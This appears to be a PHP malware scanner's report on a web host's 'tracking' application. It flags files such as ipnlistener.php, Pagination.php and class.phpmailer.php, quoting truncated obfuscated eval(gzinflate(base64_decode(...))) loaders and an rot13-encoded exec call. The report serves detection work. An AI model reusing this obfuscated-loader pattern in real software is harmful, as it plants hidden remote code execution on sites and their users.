<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHVVbW/aSBD+jsR/mHO52FQtTnvv5k1I5KpKufQupV8uiqy1PeBtl11rvRhodf/9ZheMDWn4EOL1zDPPPPPs0O2EL7sdeAmLnJew5AJhy4WAQnNpwOQIuVkLSJU0jEsuVyCVwRKYzMDgzjCNDIwClmXAQOIWlMQBWMiw2+l2wvAejeZY2VQLl7J1wfhKwvt5t9NzuKmJebaDMfTi+5t/Pt18XDz4rRf+47DbmU66nVHGKyjNXuDY2/LM5BH8en1d7IY58lVuImAbo4YeRQJ9RvnbyZ3julQavFEyGU2LvABMc0s3ZlmVxKmIV2jiuprcrBPUQZtWfwjTyShMJt4oJMQjtmWSClaWY89BxVkW153FTiGvZlqTe+uogqpQL4XaHtkWJBxJE8Eb+7bm7mpYts3j80K6ck3gifxhUOPLXt3xRYt2Uk2h90sHfsIGbucNTGu...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAHVVbW/aSBD+jsR/mHO52FQtTnvv5k1I5KpKufQupV8uiqy1PeBtl11rvRhodf/9ZheMDWn4EOL1zDPPPPPs0O2EL7sdeAmLnJew5AJhy4WAQnNpwOQIuVkLSJU0jEsuVyCVwRKYzMDgzjCNDIwClmXAQOIWlMQBWMiw2+l2wvAejeZY2VQLl7J1wfhKwvt5t9NzuKmJebaDMfTi+5t/Pt18XDz4rRf+47DbmU66nVHGKyjNXuDY2/LM5BH8en1d7IY58lVuImAbo4YeRQJ9RvnbyZ3julQavFEyGU2LvABMc0s3ZlmVxKmIV2jiuprcrBPUQZtWfwjTyShMJt4oJMQjtmWSClaWY89BxVkW153FTiGvZlqTe+uogqpQL4XaHtkWJBxJE8Eb+7bm7mpYts3j80K6ck3gifxhUOPLXt3xRYt2Uk2h90sHfsIGbucNTGu...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/php-paypal-ipn/ipnlistener.php

Size: 3.78 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAOVabXPaSBL+vKnKf5hQVIAsFuRlq3L2eWu9Nl5TRQwLeO9SyRY1iMFMRUjaGcmY281/v+6ZkTQSEpBN7tPxwcaanp7unu6nX+SnTzovXjx9Ql4QMqLbEfVIf3RLBlxGzGcCF/TiBXE9KiWJAuKpRbIMBKH+gqzgh8dI35cR9SPksmbw+zaI+JK7NOKBL0kTuLbIUgRrovlFK5YcKJl4YMLJzlpFUShPO517Hq3iueMG686vMX8Eho+d0c3oRO87AZbZnp9C6n6i94zAZ5cG1mkcrUBi/LwDsVbkkgrB3U9m2Q3CreD3q4iQptsir7ovX5GTUkqQVYJOyOiV89Lp4uPO0yfaPP3QT2xH/oQV+Oif2sr4AR79JYlEzNrKCoKBgmCyBVsQ9248QPHBxnNBxZZwSWIJC2B2CSRqQxjIiMxBXZJxhHWtsYPMlyALQ1q4JRm4n4KQ+c1WwswhV2xJYy9SQjgJk4zZTw9UkHk...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOVabXPaSBL+vKnKf5hQVIAsFuRlq3L2eWu9Nl5TRQwLeO9SyRY1iMFMRUjaGcmY281/v+6ZkTQSEpBN7tPxwcaanp7unu6nX+SnTzovXjx9Ql4QMqLbEfVIf3RLBlxGzGcCF/TiBXE9KiWJAuKpRbIMBKH+gqzgh8dI35cR9SPksmbw+zaI+JK7NOKBL0kTuLbIUgRrovlFK5YcKJl4YMLJzlpFUShPO517Hq3iueMG686vMX8Eho+d0c3oRO87AZbZnp9C6n6i94zAZ5cG1mkcrUBi/LwDsVbkkgrB3U9m2Q3CreD3q4iQptsir7ovX5GTUkqQVYJOyOiV89Lp4uPO0yfaPP3QT2xH/oQV+Oif2sr4AR79JYlEzNrKCoKBgmCyBVsQ9248QPHBxnNBxZZwSWIJC2B2CSRqQxjIiMxBXZJxhHWtsYPMlyALQ1q4JRm...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOVabXPaSBL+vKnKf5hQVIAsFuRlq3L2eWu9Nl5TRQwLeO9SyRY1iMFMRUjaGcmY281/v+6ZkTQSEpBN7tPxwcaanp7unu6nX+SnTzovXjx9Ql4QMqLbEfVIf3RLBlxGzGcCF/TiBXE9KiWJAuKpRbIMBKH+gqzgh8dI35cR9SPksmbw+zaI+JK7NOKBL0kTuLbIUgRrovlFK5YcKJl4YMLJzlpFUShPO517Hq3iueMG686vMX8Eho+d0c3oRO87AZbZnp9C6n6i94zAZ5cG1mkcrUBi/LwDsVbkkgrB3U9m2Q3CreD3q4iQptsir7ovX5GTUkqQVYJOyOiV89Lp4uPO0yfaPP3QT2xH/oQV+Oif2sr4AR79JYlEzNrKCoKBgmCyBVsQ9248QPHBxnNBxZZwSWIJC2B2CSRqQxjIiMxBXZJxhHWtsYPMlyALQ1q4JRm...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/static/db-needs-upd.php

Size: 1.19 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 3
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1WYW/bNhD93AD+DxfuSwtUUlJgWxtLyjLHaDNsWIB6GIaiCGjqbNOhKJakHHu/fkdJieNEwbJ4sh3Lx3ePx7t3Fw0OBvRKEji/+Hz2869jGJ2NPo0HBwvkBdrXbMTFAqNRpb2t1AnoKhLB8hbK2vnI4oorWXCP7M0QiOXTZHKZHMfHW4Lx2kiL7gQ+c/8W3v0Av9QKjj98+BGOvj85OqI3fPxt0rmfExNIDX6BYLjzg4PTfHCQHp7/Ppr8dTmGhS9VMIRvUFzPM4aa5eEIadiwuQO60hI9J7g3EX6r5Spj4QiofTTZGGQg2l8Z87j2SaAbglhw69BntZ9F7xkkWzIvvcL8bDSBP7nVUs/TpDXdIU7NwlDgQtUFAutuEuFcTAtsCKdb6GEUfZEzUB4uxvD+a546v1EInuLqwiE3BiUWkmeMK8Xyn2RpKuuhtuo1o9VEYhxAb4Zp0njn6eEX1IWcfY2ikJ/kLhntK51...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1WYW/bNhD93AD+DxfuSwtUUlJgWxtLyjLHaDNsWIB6GIaiCGjqbNOhKJakHHu/fkdJieNEwbJ4sh3Lx3ePx7t3Fw0OBvRKEji/+Hz2869jGJ2NPo0HBwvkBdrXbMTFAqNRpb2t1AnoKhLB8hbK2vnI4oorWXCP7M0QiOXTZHKZHMfHW4Lx2kiL7gQ+c/8W3v0Av9QKjj98+BGOvj85OqI3fPxt0rmfExNIDX6BYLjzg4PTfHCQHp7/Ppr8dTmGhS9VMIRvUFzPM4aa5eEIadiwuQO60hI9J7g3EX6r5Spj4QiofTTZGGQg2l8Z87j2SaAbglhw69BntZ9F7xkkWzIvvcL8bDSBP7nVUs/TpDXdIU7NwlDgQtUFAutuEuFcTAtsCKdb6GEUfZEzUB4uxvD+a546v1EInuLqwiE3BiUWkmeMK8Xyn2RpKuuhtuo1o9V...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1WYW/bNhD93AD+DxfuSwtUUlJgWxtLyjLHaDNsWIB6GIaiCGjqbNOhKJakHHu/fkdJieNEwbJ4sh3Lx3ePx7t3Fw0OBvRKEji/+Hz2869jGJ2NPo0HBwvkBdrXbMTFAqNRpb2t1AnoKhLB8hbK2vnI4oorWXCP7M0QiOXTZHKZHMfHW4Lx2kiL7gQ+c/8W3v0Av9QKjj98+BGOvj85OqI3fPxt0rmfExNIDX6BYLjzg4PTfHCQHp7/Ppr8dTmGhS9VMIRvUFzPM4aa5eEIadiwuQO60hI9J7g3EX6r5Spj4QiofTTZGGQg2l8Z87j2SaAbglhw69BntZ9F7xkkWzIvvcL8bDSBP7nVUs/TpDXdIU7NwlDgQtUFAutuEuFcTAtsCKdb6GEUfZEzUB4uxvD+a546v1EInuLqwiE3BiUWkmeMK8Xyn2RpKuuhtuo1o9V...

Function str_rot13 exec_str_rot13 Line: 3 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

<?php Rkrp

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/static/db-upd-done.php

Size: 1.68 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1XbW8aORD+3Ej5D5ONIrVSdhfoJdcQ4C6XoGtOOV2lch+qqorMrhecem3X9ga4qP/9xvsSWLKkKBRCWNvPPDOeN5v9vX18hyFcXX+8+ONmCJcXl++H+3tTSmKqX3uXJJpS/1IKqyXvgpB+5GaOIc2M9TW9J5zFxFLvzTkgy/vR6EPYDtpLguFcMU1NFz4SewydU/gr49A+O/sVWifdVgv/4M+/R6X4FTIBE2CnFBQxdn/vt8H+Xu/g6p/L0acPQ5jalLsJ9w2ciEnfo8IbuC30nML8CfDVS6klCLfKp98ydt/33BaosP5ooagHUTHqe5bObejoziGaEm2o7Wc28d95EC7JLLOcDi4uR3AtEtkLi3FdlyAp7XtajqU1K/xCMhHTubMxxxq74BQsGlHqjgzCUxoz0vcI5xXQvX5nqZLaQqb5ay8IHDTM5QMn9Ob8eeTdt4zqRTBbGDZbTLYSSUhEx3K+FfaemQxj/99...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1XbW8aORD+3Ej5D5ONIrVSdhfoJdcQ4C6XoGtOOV2lch+qqorMrhecem3X9ga4qP/9xvsSWLKkKBRCWNvPPDOeN5v9vX18hyFcXX+8+ONmCJcXl++H+3tTSmKqX3uXJJpS/1IKqyXvgpB+5GaOIc2M9TW9J5zFxFLvzTkgy/vR6EPYDtpLguFcMU1NFz4SewydU/gr49A+O/sVWifdVgv/4M+/R6X4FTIBE2CnFBQxdn/vt8H+Xu/g6p/L0acPQ5jalLsJ9w2ciEnfo8IbuC30nML8CfDVS6klCLfKp98ydt/33BaosP5ooagHUTHqe5bObejoziGaEm2o7Wc28d95EC7JLLOcDi4uR3AtEtkLi3FdlyAp7XtajqU1K/xCMhHTubMxxxq74BQsGlHqjgzCUxoz0vcI5xXQvX5nqZLaQqb5ay8IHDTM5QMn9Ob8eeT...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1XbW8aORD+3Ej5D5ONIrVSdhfoJdcQ4C6XoGtOOV2lch+qqorMrhecem3X9ga4qP/9xvsSWLKkKBRCWNvPPDOeN5v9vX18hyFcXX+8+ONmCJcXl++H+3tTSmKqX3uXJJpS/1IKqyXvgpB+5GaOIc2M9TW9J5zFxFLvzTkgy/vR6EPYDtpLguFcMU1NFz4SewydU/gr49A+O/sVWifdVgv/4M+/R6X4FTIBE2CnFBQxdn/vt8H+Xu/g6p/L0acPQ5jalLsJ9w2ciEnfo8IbuC30nML8CfDVS6klCLfKp98ydt/33BaosP5ooagHUTHqe5bObejoziGaEm2o7Wc28d95EC7JLLOcDi4uR3AtEtkLi3FdlyAp7XtajqU1K/xCMhHTubMxxxq74BQsGlHqjgzCUxoz0vcI5xXQvX5nqZLaQqb5ay8IHDTM5QMn9Ob8eeT...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/static/twilio-keys-missing.php

Size: 1.25 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1W62/bNhD/3AD+Hy7clxaoxKTDutaRlXm2sbrb0AAxBgxFEdDU2aZNiSpJ+bG/vkdLrePYwbp48ku6x+/eZ7bOWvTiHPrD2+6vfwyg1+29G7TOZigytM9ZT8gZRj1TeGt0GwoTyUB5CXnlfGRxKbTKhEf24goI5d1odMMv48sdwGBdKouuDbfCv4RXr+F9peHy7duf4eKn9sUFveG3P0eNep+QQBXgZwilcL51dp22zpLz/ofe6O+bAcx8rgMh/IIWxbTDsGBpCCEJBrd3QFeSoxck7ssIP1dq2WEhBCx8NNqUyEDWTx3mce15gLsCORPWoe9UfhK9YcB3YF55jWm3N4KBtcYmvCZ841+Xs5LclrrKEFhzw6VzMTHYFVzvRM+j6KOagPYwHMCbT2ni/EYjePKqcYbUGOSYKdFhQmuW/qLy0lgPldXPGXG5wjgIvbhK+FY7Tc4/YpGpyacoCtnh31JRv5KxyTZ1kjK...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1W62/bNhD/3AD+Hy7clxaoxKTDutaRlXm2sbrb0AAxBgxFEdDU2aZNiSpJ+bG/vkdLrePYwbp48ku6x+/eZ7bOWvTiHPrD2+6vfwyg1+29G7TOZigytM9ZT8gZRj1TeGt0GwoTyUB5CXnlfGRxKbTKhEf24goI5d1odMMv48sdwGBdKouuDbfCv4RXr+F9peHy7duf4eKn9sUFveG3P0eNep+QQBXgZwilcL51dp22zpLz/ofe6O+bAcx8rgMh/IIWxbTDsGBpCCEJBrd3QFeSoxck7ssIP1dq2WEhBCx8NNqUyEDWTx3mce15gLsCORPWoe9UfhK9YcB3YF55jWm3N4KBtcYmvCZ841+Xs5LclrrKEFhzw6VzMTHYFVzvRM+j6KOagPYwHMCbT2ni/EYjePKqcYbUGOSYKdFhQmuW/qLy0lgPldXPGXG5wjgIvbh...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1W62/bNhD/3AD+Hy7clxaoxKTDutaRlXm2sbrb0AAxBgxFEdDU2aZNiSpJ+bG/vkdLrePYwbp48ku6x+/eZ7bOWvTiHPrD2+6vfwyg1+29G7TOZigytM9ZT8gZRj1TeGt0GwoTyUB5CXnlfGRxKbTKhEf24goI5d1odMMv48sdwGBdKouuDbfCv4RXr+F9peHy7duf4eKn9sUFveG3P0eNep+QQBXgZwilcL51dp22zpLz/ofe6O+bAcx8rgMh/IIWxbTDsGBpCCEJBrd3QFeSoxck7ssIP1dq2WEhBCx8NNqUyEDWTx3mce15gLsCORPWoe9UfhK9YcB3YF55jWm3N4KBtcYmvCZ841+Xs5LclrrKEFhzw6VzMTHYFVzvRM+j6KOagPYwHMCbT2ni/EYjePKqcYbUGOSYKdFhQmuW/qLy0lgPldXPGXG5wjgIvbh...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/static/zapier-call-action-twiml.php

Size: 699.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:51 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1UXWvbMBR9D+Q/XESoE6g/Umi3unb8kGaFwraucZ/WETT7LhbYkpHkkjD23yc5buYsed8YM3qw7z33nHOvJA8Hw0GBNEc5duaCa+Ta1dsaQ9C40f6mKp3JzR5C5jQr0LVAKcoQuHAzGzmHqlHalfhCS5ZTjaRftNjUTKIKYUn1OVxcwX1TwvT6+g0El2EQmAV379O2ZDgYVagUXSPEwJRCPR6tHhefnhbL9LPTpZwvE0jgVBxCIMTQjDJR1ZRvV7ypThH10kdkB7lfhLQsUZ7iKk2XFvwV5RHXQe6VC7NCgBMlZrbwglIxwWMy9QICyDORM76OyVP6zn1LkpnjkWf5zG1ZMhsOokdUteAK7XtSFzWwb+MjR7dszbSyZs7O4EQ8NnJk8h0sI5gnumW0hAp1IfKYPHxcpgRopltfnuebJTETMl/ZIXhGNbEFc/ORinhno+2pkWXbAY7785/cGCHSSbVyH9qBzHqV3Xg...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1UXWvbMBR9D+Q/XESoE6g/Umi3unb8kGaFwraucZ/WETT7LhbYkpHkkjD23yc5buYsed8YM3qw7z33nHOvJA8Hw0GBNEc5duaCa+Ta1dsaQ9C40f6mKp3JzR5C5jQr0LVAKcoQuHAzGzmHqlHalfhCS5ZTjaRftNjUTKIKYUn1OVxcwX1TwvT6+g0El2EQmAV379O2ZDgYVagUXSPEwJRCPR6tHhefnhbL9LPTpZwvE0jgVBxCIMTQjDJR1ZRvV7ypThH10kdkB7lfhLQsUZ7iKk2XFvwV5RHXQe6VC7NCgBMlZrbwglIxwWMy9QICyDORM76OyVP6zn1LkpnjkWf5zG1ZMhsOokdUteAK7XtSFzWwb+MjR7dszbSyZs7O4EQ8NnJk8h0sI5gnumW0hAp1IfKYPHxcpgRopltfnuebJTETMl/ZIXhGNbEFc/ORinh...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1UXWvbMBR9D+Q/XESoE6g/Umi3unb8kGaFwraucZ/WETT7LhbYkpHkkjD23yc5buYsed8YM3qw7z33nHOvJA8Hw0GBNEc5duaCa+Ta1dsaQ9C40f6mKp3JzR5C5jQr0LVAKcoQuHAzGzmHqlHalfhCS5ZTjaRftNjUTKIKYUn1OVxcwX1TwvT6+g0El2EQmAV379O2ZDgYVagUXSPEwJRCPR6tHhefnhbL9LPTpZwvE0jgVBxCIMTQjDJR1ZRvV7ypThH10kdkB7lfhLQsUZ7iKk2XFvwV5RHXQe6VC7NCgBMlZrbwglIxwWMy9QICyDORM76OyVP6zn1LkpnjkWf5zG1ZMhsOokdUteAK7XtSFzWwb+MjR7dszbSyZs7O4EQ8NnJk8h0sI5gnumW0hAp1IfKYPHxcpgRopltfnuebJTETMl/ZIXhGNbEFc/ORinh...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/Pagination.php

Size: 1.58 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAKVXbW/bNhD+nAD5DxfFieQ4teZuRYf6pQOCdgjQAUHTb8MQqDJtE1EkhaIyZGv++45HUqJoaSuyL4Z1PD733N1zJ/vo8OgwzZKqgutky/NE8iKHo8O/jw4P4vNz/IRzuKyFYLlUHows2vzLYyKA55JtmSBLjJ/KNirRcY4PLsgN/4tBsQG5YyBYWoh1BSUTUH4vaIUAPuiXQiaZhfsuFKlu3JobPtwnnt9BXbE1yAK+1jxbQ5488i1VxYevpOD5toueIYAPeknVvSxyvFCnshAuUJmI5N4y1YXrP1HZ9590MmrobOo8pV62bY0IHpaQ11l2oSHbpw6MMY8RSCnhYCR3vHq1Mveb/lq7QWpaZO0+5n71n32VMBlWpJHUiM7Xh86+zu/y4s/8Vj6VzClbJ/OKSaVYnfZAKj9MmmSGqfybXIfa5DNR8o/o2GdiiodMbPkUkz4qQ2LvE0QvCRqXzxog0n4+G79lSItMAxX...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVXbW/bNhD+nAD5DxfFieQ4teZuRYf6pQOCdgjQAUHTb8MQqDJtE1EkhaIyZGv++45HUqJoaSuyL4Z1PD733N1zJ/vo8OgwzZKqgutky/NE8iKHo8O/jw4P4vNz/IRzuKyFYLlUHows2vzLYyKA55JtmSBLjJ/KNirRcY4PLsgN/4tBsQG5YyBYWoh1BSUTUH4vaIUAPuiXQiaZhfsuFKlu3JobPtwnnt9BXbE1yAK+1jxbQ5488i1VxYevpOD5toueIYAPeknVvSxyvFCnshAuUJmI5N4y1YXrP1HZ9590MmrobOo8pV62bY0IHpaQ11l2oSHbpw6MMY8RSCnhYCR3vHq1Mveb/lq7QWpaZO0+5n71n32VMBlWpJHUiM7Xh86+zu/y4s/8Vj6VzClbJ/OKSaVYnfZAKj9MmmSGqfybXIfa5DNR8o/o2GdiiodMbPk...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVXbW/bNhD+nAD5DxfFieQ4teZuRYf6pQOCdgjQAUHTb8MQqDJtE1EkhaIyZGv++45HUqJoaSuyL4Z1PD733N1zJ/vo8OgwzZKqgutky/NE8iKHo8O/jw4P4vNz/IRzuKyFYLlUHows2vzLYyKA55JtmSBLjJ/KNirRcY4PLsgN/4tBsQG5YyBYWoh1BSUTUH4vaIUAPuiXQiaZhfsuFKlu3JobPtwnnt9BXbE1yAK+1jxbQ5488i1VxYevpOD5toueIYAPeknVvSxyvFCnshAuUJmI5N4y1YXrP1HZ9590MmrobOo8pV62bY0IHpaQ11l2oSHbpw6MMY8RSCnhYCR3vHq1Mveb/lq7QWpaZO0+5n71n32VMBlWpJHUiM7Xh86+zu/y4s/8Vj6VzClbJ/OKSaVYnfZAKj9MmmSGqfybXIfa5DNR8o/o2GdiiodMbPk...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/class.emailtemplates.php

Size: 2.06 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1ZbW/iOBD+vtL+B1+EBEiBkqS0ZSvYaymrdtU3FW5Ptz3EmsQU9xInFzul3Kr//cYkQCAOdFd7J1Vbf0Ah8+KZZ8b2jPP2je1izlHHw9TtES9wsSBf375BMIKQPsA/VCCSOBDTgHDURDgM8bQUs8ixsyN/z07Q5dFFB6VGt3PeaffQ+dFx53zJHosbevGMPfjUJkW9pq+rlEO7ZZE3JKE/cgl2eF/T1+k0VhCQkPqOgm5jPgaiFM+hCl9gN1GDPT9iQsXoewFmU8pGfr4Rsa0q6SgMCRMOAKmgjiLXZdhTkSJOQuw4IeEq3yXVpmKaQ+JCPZ+k/UMDFSV0+9ryZbmsr4fM1Iu/gXicKvlRk1PMEubb3d1ACrAShs2x2Yy9yuM4l5c+W3qxjV0X3ZDADwU4nYWlrhePgEOy8aJu5KAyCn1PYYNQme1EIRbUZ/n+Kighsf3QoexueyD3Yqc4uqCcE+fHGK2yTDH3/nz...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1ZbW/iOBD+vtL+B1+EBEiBkqS0ZSvYaymrdtU3FW5Ptz3EmsQU9xInFzul3Kr//cYkQCAOdFd7J1Vbf0Ah8+KZZ8b2jPP2je1izlHHw9TtES9wsSBf375BMIKQPsA/VCCSOBDTgHDURDgM8bQUs8ixsyN/z07Q5dFFB6VGt3PeaffQ+dFx53zJHosbevGMPfjUJkW9pq+rlEO7ZZE3JKE/cgl2eF/T1+k0VhCQkPqOgm5jPgaiFM+hCl9gN1GDPT9iQsXoewFmU8pGfr4Rsa0q6SgMCRMOAKmgjiLXZdhTkSJOQuw4IeEq3yXVpmKaQ+JCPZ+k/UMDFSV0+9ryZbmsr4fM1Iu/gXicKvlRk1PMEubb3d1ACrAShs2x2Yy9yuM4l5c+W3qxjV0X3ZDADwU4nYWlrhePgEOy8aJu5KAyCn1PYYNQme1EIRbUZ/n+Kig...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1ZbW/iOBD+vtL+B1+EBEiBkqS0ZSvYaymrdtU3FW5Ptz3EmsQU9xInFzul3Kr//cYkQCAOdFd7J1Vbf0Ah8+KZZ8b2jPP2je1izlHHw9TtES9wsSBf375BMIKQPsA/VCCSOBDTgHDURDgM8bQUs8ixsyN/z07Q5dFFB6VGt3PeaffQ+dFx53zJHosbevGMPfjUJkW9pq+rlEO7ZZE3JKE/cgl2eF/T1+k0VhCQkPqOgm5jPgaiFM+hCl9gN1GDPT9iQsXoewFmU8pGfr4Rsa0q6SgMCRMOAKmgjiLXZdhTkSJOQuw4IeEq3yXVpmKaQ+JCPZ+k/UMDFSV0+9ryZbmsr4fM1Iu/gXicKvlRk1PMEubb3d1ACrAShs2x2Yy9yuM4l5c+W3qxjV0X3ZDADwU4nYWlrhePgEOy8aJu5KAyCn1PYYNQme1EIRbUZ/n+Kig...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/class.phpmailer.php

Size: 25.00 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO19eX8bN87w393fr9+B0borKdHhI0drx0kcR2m866u20nY3yuoZSWN7mpFGnRn5yCbPZ38B8OYckhy323efdRtbmiFBEgQBEATAr//Uvv+/bBh6SdKaXkzHXhD6MX76+k+t5t39tL7+0yfGTqOz9MqL/U12/Ob4gJpiTfzMfGyYd4Mt8POJwLEf/TgJoskme9Rab60tUrEUHPycBin07iJNp8lmuz2MRn7rPIrOQ781jMZtr+1NveGF3/Sv09hLWlF83p62FdraJrg7Q53u3c5oHMBg/xqM2V+988APkw8Bq03j6Bd/mDIP38J/CXQtjeL6nMHuzNKLKE422c5kdMOOY/8ySlJWwyFfRfF16g8v6sz89mKWALpbSTSLh/4ZDN1vTfzUwB3+bLIDLx7OEvYyCiZpNEGAUTiIZwiLPhSAyU4FB+cM9pdg/It3Xmf874tzRDxOzZzBvo5mk5Efb7KXsT9J2UkLupl+9MP...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19eX8bN87w393fr9+B0borKdHhI0drx0kcR2m866u20nY3yuoZSWN7mpFGnRn5yCbPZ38B8OYckhy323efdRtbmiFBEgQBEATAr//Uvv+/bBh6SdKaXkzHXhD6MX76+k+t5t39tL7+0yfGTqOz9MqL/U12/Ob4gJpiTfzMfGyYd4Mt8POJwLEf/TgJoskme9Rab60tUrEUHPycBin07iJNp8lmuz2MRn7rPIrOQ781jMZtr+1NveGF3/Sv09hLWlF83p62FdraJrg7Q53u3c5oHMBg/xqM2V+988APkw8Bq03j6Bd/mDIP38J/CXQtjeL6nMHuzNKLKE422c5kdMOOY/8ySlJWwyFfRfF16g8v6sz89mKWALpbSTSLh/4ZDN1vTfzUwB3+bLIDLx7OEvYyCiZpNEGAUTiIZwiLPhSAyU4FB+cM9pdg/It3Xmf874t...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

